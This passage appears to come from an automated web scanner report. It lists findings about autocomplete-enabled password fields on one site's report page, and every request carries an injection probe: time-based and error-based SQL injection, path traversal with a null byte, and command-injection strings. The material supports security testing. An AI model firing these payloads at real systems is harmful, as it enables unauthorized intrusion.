       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.177. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.178. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.179. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.180. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.181. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.182. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.183. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.184. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.185. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.186. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.187. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.188. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.189. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.190. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.191. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.192. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.193. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
